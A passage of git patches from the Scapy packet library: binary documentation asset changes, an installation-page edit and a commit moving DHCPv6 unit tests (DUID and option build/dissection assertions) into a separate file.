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 diff --git a/doc/scapy/installation.rst b/doc/scapy/installation.rst index 1ab8f6cb4fe..6a471cc25bc 100644 --- a/doc/scapy/installation.rst +++ b/doc/scapy/installation.rst @@ -18,7 +18,12 @@ Each of these steps can be done in a different way depending on your platform an Scapy versions ============== -.. image:: graphics/scapy_version_timeline.jpg +.. raw:: html + +
+ + +
.. note:: diff --git a/doc/scapy_version_timeline.ods b/doc/scapy_version_timeline.ods deleted file mode 100644 index 10e0bca6960601bbbff4912fea3b82d94b39a010..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3764 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 Date: Mon, 24 Aug 2020 15:01:56 +0200 Subject: [PATCH 0293/1632] Standalone DHCPv6 unit tests Co-authored-by: Phil Co-authored-by: gpotter2 Co-authored-by: Michael Farrell Co-authored-by: Pierre Lalet --- test/regression.uts | 1425 ----------------------------------- test/scapy/layers/dhcp6.uts | 1425 +++++++++++++++++++++++++++++++++++ 2 files changed, 1425 insertions(+), 1425 deletions(-) create mode 100644 test/scapy/layers/dhcp6.uts diff --git a/test/regression.uts b/test/regression.uts index fd2817079e2..18c4fa8fc41 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4771,1431 +4771,6 @@ assert r[ICMPv6NDOptSrcLLAddr].lladdr == "aa:aa:aa:aa:aa:aa" ########### ICMPv6ND_INDSol Class ################################### ########### ICMPv6ND_INDAdv Class ################################### - - - - -##################################################################### -##################################################################### -########################## DHCPv6 ########################## -##################################################################### -##################################################################### - - -############ -############ -+ Test DHCP6 DUID_LLT - -= DUID_LLT basic instantiation -a=DUID_LLT() - -= DUID_LLT basic build -raw(DUID_LLT()) == b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DUID_LLT build with specific values -raw(DUID_LLT(lladdr="ff:ff:ff:ff:ff:ff", timeval=0x11111111, hwtype=0x2222)) == b'\x00\x01""\x11\x11\x11\x11\xff\xff\xff\xff\xff\xff' - -= DUID_LLT basic dissection -a=DUID_LLT(raw(DUID_LLT())) -a.type == 1 and a.hwtype == 1 and a.timeval == 0 and a.lladdr == "00:00:00:00:00:00" - -= DUID_LLT dissection with specific values -a=DUID_LLT(b'\x00\x01""\x11\x11\x11\x11\xff\xff\xff\xff\xff\xff') -a.type == 1 and a.hwtype == 0x2222 and a.timeval == 0x11111111 and a.lladdr == "ff:ff:ff:ff:ff:ff" - - -############ -############ -+ Test DHCP6 DUID_EN - -= DUID_EN basic instantiation -a=DUID_EN() - -= DUID_EN basic build -raw(DUID_EN()) == b'\x00\x02\x00\x00\x017' - -= DUID_EN build with specific values -raw(DUID_EN(enterprisenum=0x11111111, id="iamastring")) == b'\x00\x02\x11\x11\x11\x11iamastring' - -= DUID_EN basic dissection -a=DUID_EN(b'\x00\x02\x00\x00\x017') -a.type == 2 and a.enterprisenum == 311 - -= DUID_EN dissection with specific values -a=DUID_EN(b'\x00\x02\x11\x11\x11\x11iamarawing') -a.type == 2 and a.enterprisenum == 0x11111111 and a.id == b"iamarawing" - - -############ -############ -+ Test DHCP6 DUID_LL - -= DUID_LL basic instantiation -a=DUID_LL() - -= DUID_LL basic build -raw(DUID_LL()) == b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00' - -= DUID_LL build with specific values -raw(DUID_LL(hwtype=1, lladdr="ff:ff:ff:ff:ff:ff")) == b'\x00\x03\x00\x01\xff\xff\xff\xff\xff\xff' - -= DUID_LL basic dissection -a=DUID_LL(raw(DUID_LL())) -a.type == 3 and a.hwtype == 1 and a.lladdr == "00:00:00:00:00:00" - -= DUID_LL with specific values -a=DUID_LL(b'\x00\x03\x00\x01\xff\xff\xff\xff\xff\xff') -a.hwtype == 1 and a.lladdr == "ff:ff:ff:ff:ff:ff" - - -############ -############ -+ Test DHCP6 DUID_UUID - -= DUID_UUID basic instantiation -a=DUID_UUID() - -= DUID_UUID basic build -raw(DUID_UUID()) == b"\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" - -= DUID_UUID build with specific values -raw(DUID_UUID(uuid="272adcca-138c-4e8d-b3f4-634e953128cf")) == \ - b"\x00\x04'*\xdc\xca\x13\x8cN\x8d\xb3\xf4cN\x951(\xcf" - -= DUID_UUID basic dissection -a=DUID_UUID(raw(DUID_UUID())) -a.type == 4 and str(a.uuid) == "00000000-0000-0000-0000-000000000000" - -= DUID_UUID with specific values -a=DUID_UUID(b"\x00\x04'*\xdc\xca\x13\x8cN\x8d\xb3\xf4cN\x951(\xcf") -a.type == 4 and str(a.uuid) == "272adcca-138c-4e8d-b3f4-634e953128cf" - - -############ -############ -+ Test DHCP6 Opt Unknown - -= DHCP6 Opt Unknown basic instantiation -a=DHCP6OptUnknown() - -= DHCP6 Opt Unknown basic build (default values) -raw(DHCP6OptUnknown()) == b'\x00\x00\x00\x00' - -= DHCP6 Opt Unknown - len computation test -raw(DHCP6OptUnknown(data="shouldbe9")) == b'\x00\x00\x00\tshouldbe9' - - -############ -############ -+ Test DHCP6 Client Identifier option - -= DHCP6OptClientId basic instantiation -a=DHCP6OptClientId() - -= DHCP6OptClientId basic build -raw(DHCP6OptClientId()) == b'\x00\x01\x00\x00' - -= DHCP6OptClientId instantiation with specific values -raw(DHCP6OptClientId(duid="toto")) == b'\x00\x01\x00\x04toto' - -= DHCP6OptClientId instantiation with DUID_LL -raw(DHCP6OptClientId(duid=DUID_LL())) == b'\x00\x01\x00\n\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00' - -= DHCP6OptClientId instantiation with DUID_LLT -raw(DHCP6OptClientId(duid=DUID_LLT())) == b'\x00\x01\x00\x0e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6OptClientId instantiation with DUID_EN -raw(DHCP6OptClientId(duid=DUID_EN())) == b'\x00\x01\x00\x06\x00\x02\x00\x00\x017' - -= DHCP6OptClientId instantiation with specified length -raw(DHCP6OptClientId(optlen=80, duid="somestring")) == b'\x00\x01\x00Psomestring' - -= DHCP6OptClientId basic dissection -a=DHCP6OptClientId(b'\x00\x01\x00\x00') -a.optcode == 1 and a.optlen == 0 - -= DHCP6OptClientId instantiation with specified length -raw(DHCP6OptClientId(optlen=80, duid="somestring")) == b'\x00\x01\x00Psomestring' - -= DHCP6OptClientId basic dissection -a=DHCP6OptClientId(b'\x00\x01\x00\x00') -a.optcode == 1 and a.optlen == 0 - -= DHCP6OptClientId dissection with specific duid value -a=DHCP6OptClientId(b'\x00\x01\x00\x04somerawing') -a.optcode == 1 and a.optlen == 4 and isinstance(a.duid, Raw) and a.duid.load == b'some' and isinstance(a.payload, DHCP6OptUnknown) - -= DHCP6OptClientId dissection with specific DUID_LL as duid value -a=DHCP6OptClientId(b'\x00\x01\x00\n\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00') -a.optcode == 1 and a.optlen == 10 and isinstance(a.duid, DUID_LL) and a.duid.type == 3 and a.duid.hwtype == 1 and a.duid.lladdr == "00:00:00:00:00:00" - -= DHCP6OptClientId dissection with specific DUID_LLT as duid value -a=DHCP6OptClientId(b'\x00\x01\x00\x0e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.optcode == 1 and a.optlen == 14 and isinstance(a.duid, DUID_LLT) and a.duid.type == 1 and a.duid.hwtype == 1 and a.duid.timeval == 0 and a.duid.lladdr == "00:00:00:00:00:00" - -= DHCP6OptClientId dissection with specific DUID_EN as duid value -a=DHCP6OptClientId(b'\x00\x01\x00\x06\x00\x02\x00\x00\x017') -a.optcode == 1 and a.optlen == 6 and isinstance(a.duid, DUID_EN) and a.duid.type == 2 and a.duid.enterprisenum == 311 and a.duid.id == b"" - - -############ -############ -+ Test DHCP6 Server Identifier option - -= DHCP6OptServerId basic instantiation -a=DHCP6OptServerId() - -= DHCP6OptServerId basic build -raw(DHCP6OptServerId()) == b'\x00\x02\x00\x00' - -= DHCP6OptServerId basic build with specific values -raw(DHCP6OptServerId(duid="toto")) == b'\x00\x02\x00\x04toto' - -= DHCP6OptServerId instantiation with DUID_LL -raw(DHCP6OptServerId(duid=DUID_LL())) == b'\x00\x02\x00\n\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00' - -= DHCP6OptServerId instantiation with DUID_LLT -raw(DHCP6OptServerId(duid=DUID_LLT())) == b'\x00\x02\x00\x0e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6OptServerId instantiation with DUID_EN -raw(DHCP6OptServerId(duid=DUID_EN())) == b'\x00\x02\x00\x06\x00\x02\x00\x00\x017' - -= DHCP6OptServerId instantiation with specified length -raw(DHCP6OptServerId(optlen=80, duid="somestring")) == b'\x00\x02\x00Psomestring' - -= DHCP6OptServerId basic dissection -a=DHCP6OptServerId(b'\x00\x02\x00\x00') -a.optcode == 2 and a.optlen == 0 - -= DHCP6OptServerId dissection with specific duid value -a=DHCP6OptServerId(b'\x00\x02\x00\x04somerawing') -a.optcode == 2 and a.optlen == 4 and isinstance(a.duid, Raw) and a.duid.load == b'some' and isinstance(a.payload, DHCP6OptUnknown) - -= DHCP6OptServerId dissection with specific DUID_LL as duid value -a=DHCP6OptServerId(b'\x00\x02\x00\n\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00') -a.optcode == 2 and a.optlen == 10 and isinstance(a.duid, DUID_LL) and a.duid.type == 3 and a.duid.hwtype == 1 and a.duid.lladdr == "00:00:00:00:00:00" - -= DHCP6OptServerId dissection with specific DUID_LLT as duid value -a=DHCP6OptServerId(b'\x00\x02\x00\x0e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.optcode == 2 and a.optlen == 14 and isinstance(a.duid, DUID_LLT) and a.duid.type == 1 and a.duid.hwtype == 1 and a.duid.timeval == 0 and a.duid.lladdr == "00:00:00:00:00:00" - -= DHCP6OptServerId dissection with specific DUID_EN as duid value -a=DHCP6OptServerId(b'\x00\x02\x00\x06\x00\x02\x00\x00\x017') -a.optcode == 2 and a.optlen == 6 and isinstance(a.duid, DUID_EN) and a.duid.type == 2 and a.duid.enterprisenum == 311 and a.duid.id == b"" - - -############ -############ -+ Test DHCP6 IA Address Option (IA_TA or IA_NA suboption) - -= DHCP6OptIAAddress - Basic Instantiation -raw(DHCP6OptIAAddress()) == b'\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6OptIAAddress - Basic Dissection -a = DHCP6OptIAAddress(b'\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.optcode == 5 and a.optlen == 24 and a.addr == "::" and a.preflft == 0 and a. validlft == 0 and a.iaaddropts == [] - -= DHCP6OptIAAddress - Instantiation with specific values -raw(DHCP6OptIAAddress(optlen=0x1111, addr="2222:3333::5555", preflft=0x66666666, validlft=0x77777777, iaaddropts="somestring")) == b'\x00\x05\x11\x11""33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00UUffffwwwwsomestring' - -= DHCP6OptIAAddress - Instantiation with specific values (default optlen computation) -raw(DHCP6OptIAAddress(addr="2222:3333::5555", preflft=0x66666666, validlft=0x77777777, iaaddropts="somestring")) == b'\x00\x05\x00"""33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00UUffffwwwwsomestring' - -= DHCP6OptIAAddress - Dissection with specific values -a = DHCP6OptIAAddress(b'\x00\x05\x00"""33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00UUffffwwwwsomerawing') -a.optcode == 5 and a.optlen == 34 and a.addr == "2222:3333::5555" and a.preflft == 0x66666666 and a. validlft == 0x77777777 and a.iaaddropts[0].load == b"somerawing" - - -############ -############ -+ Test DHCP6 Identity Association for Non-temporary Addresses Option - -= DHCP6OptIA_NA - Basic Instantiation -raw(DHCP6OptIA_NA()) == b'\x00\x03\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6OptIA_NA - Basic Dissection -a = DHCP6OptIA_NA(b'\x00\x03\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.optcode == 3 and a.optlen == 12 and a.iaid == 0 and a.T1 == 0 and a.T2==0 and a.ianaopts == [] - -= DHCP6OptIA_NA - Instantiation with specific values (keep automatic length computation) -raw(DHCP6OptIA_NA(iaid=0x22222222, T1=0x33333333, T2=0x44444444)) == b'\x00\x03\x00\x0c""""3333DDDD' - -= DHCP6OptIA_NA - Instantiation with specific values (forced optlen) -raw(DHCP6OptIA_NA(optlen=0x1111, iaid=0x22222222, T1=0x33333333, T2=0x44444444)) == b'\x00\x03\x11\x11""""3333DDDD' - -= DHCP6OptIA_NA - Instantiation with a list of IA Addresses (optlen automatic computation) -raw(DHCP6OptIA_NA(iaid=0x22222222, T1=0x33333333, T2=0x44444444, ianaopts=[DHCP6OptIAAddress(), DHCP6OptIAAddress()])) == b'\x00\x03\x00D""""3333DDDD\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6OptIA_NA - Dissection with specific values -a = DHCP6OptIA_NA(b'\x00\x03\x00L""""3333DDDD\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.optcode == 3 and a.optlen == 76 and a.iaid == 0x22222222 and a.T1 == 0x33333333 and a.T2==0x44444444 and len(a.ianaopts) == 2 and isinstance(a.ianaopts[0], DHCP6OptIAAddress) and isinstance(a.ianaopts[1], DHCP6OptIAAddress) - -= DHCP6OptIA_NA - Instantiation with a list of different opts: IA Address and Status Code (optlen automatic computation) -raw(DHCP6OptIA_NA(iaid=0x22222222, T1=0x33333333, T2=0x44444444, ianaopts=[DHCP6OptIAAddress(), DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")])) == b'\x00\x03\x003""""3333DDDD\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x07\x00\xffHello' - - -############ -############ -+ Test DHCP6 Identity Association for Temporary Addresses Option - -= DHCP6OptIA_TA - Basic Instantiation -raw(DHCP6OptIA_TA()) == b'\x00\x04\x00\x04\x00\x00\x00\x00' - -= DHCP6OptIA_TA - Basic Dissection -a = DHCP6OptIA_TA(b'\x00\x04\x00\x04\x00\x00\x00\x00') -a.optcode == 4 and a.optlen == 4 and a.iaid == 0 and a.iataopts == [] - -= DHCP6OptIA_TA - Instantiation with specific values -raw(DHCP6OptIA_TA(optlen=0x1111, iaid=0x22222222, iataopts=[DHCP6OptIAAddress(), DHCP6OptIAAddress()])) == b'\x00\x04\x11\x11""""\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6OptIA_TA - Dissection with specific values -a = DHCP6OptIA_TA(b'\x00\x04\x11\x11""""\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.optcode == 4 and a.optlen == 0x1111 and a.iaid == 0x22222222 and len(a.iataopts) == 2 and isinstance(a.iataopts[0], DHCP6OptIAAddress) and isinstance(a.iataopts[1], DHCP6OptIAAddress) - -= DHCP6OptIA_TA - Instantiation with a list of different opts: IA Address and Status Code (optlen automatic computation) -raw(DHCP6OptIA_TA(iaid=0x22222222, iataopts=[DHCP6OptIAAddress(), DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")])) == b'\x00\x04\x00+""""\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x07\x00\xffHello' - - -############ -############ -+ Test DHCP6 Option Request Option - -= DHCP6OptOptReq - Basic Instantiation -raw(DHCP6OptOptReq()) == b'\x00\x06\x00\x04\x00\x17\x00\x18' - -= DHCP6OptOptReq - optlen field computation -raw(DHCP6OptOptReq(reqopts=[1,2,3,4])) == b'\x00\x06\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04' - -= DHCP6OptOptReq - instantiation with empty list -raw(DHCP6OptOptReq(reqopts=[])) == b'\x00\x06\x00\x00' - -= DHCP6OptOptReq - Basic dissection -a=DHCP6OptOptReq(b'\x00\x06\x00\x00') -a.optcode == 6 and a.optlen == 0 and a.reqopts == [23,24] - -= DHCP6OptOptReq - Dissection with specific value -a=DHCP6OptOptReq(b'\x00\x06\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04') -a.optcode == 6 and a.optlen == 8 and a.reqopts == [1,2,3,4] - -= DHCP6OptOptReq - repr -a.show() - - -############ -############ -+ Test DHCP6 Option - Preference option - -= DHCP6OptPref - Basic instantiation -raw(DHCP6OptPref()) == b'\x00\x07\x00\x01\xff' - -= DHCP6OptPref - Instantiation with specific values -raw(DHCP6OptPref(optlen=0xffff, prefval= 0x11)) == b'\x00\x07\xff\xff\x11' - -= DHCP6OptPref - Basic Dissection -a=DHCP6OptPref(b'\x00\x07\x00\x01\xff') -a.optcode == 7 and a.optlen == 1 and a.prefval == 255 - -= DHCP6OptPref - Dissection with specific values -a=DHCP6OptPref(b'\x00\x07\xff\xff\x11') -a.optcode == 7 and a.optlen == 0xffff and a.prefval == 0x11 - - -############ -############ -+ Test DHCP6 Option - Elapsed Time - -= DHCP6OptElapsedTime - Basic Instantiation -raw(DHCP6OptElapsedTime()) == b'\x00\x08\x00\x02\x00\x00' - -= DHCP6OptElapsedTime - Instantiation with specific elapsedtime value -raw(DHCP6OptElapsedTime(elapsedtime=421)) == b'\x00\x08\x00\x02\x01\xa5' - -= DHCP6OptElapsedTime - Basic Dissection -a=DHCP6OptElapsedTime(b'\x00\x08\x00\x02\x00\x00') -a.optcode == 8 and a.optlen == 2 and a.elapsedtime == 0 - -= DHCP6OptElapsedTime - Dissection with specific values -a=DHCP6OptElapsedTime(b'\x00\x08\x00\x02\x01\xa5') -a.optcode == 8 and a.optlen == 2 and a.elapsedtime == 421 - -= DHCP6OptElapsedTime - Repr -a.show() - - -############ -############ -+ Test DHCP6 Option - Server Unicast Address - -= DHCP6OptServerUnicast - Basic Instantiation -raw(DHCP6OptServerUnicast()) == b'\x00\x0c\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= DHCP6OptServerUnicast - Instantiation with specific values (test 1) -raw(DHCP6OptServerUnicast(srvaddr="2001::1")) == b'\x00\x0c\x00\x10 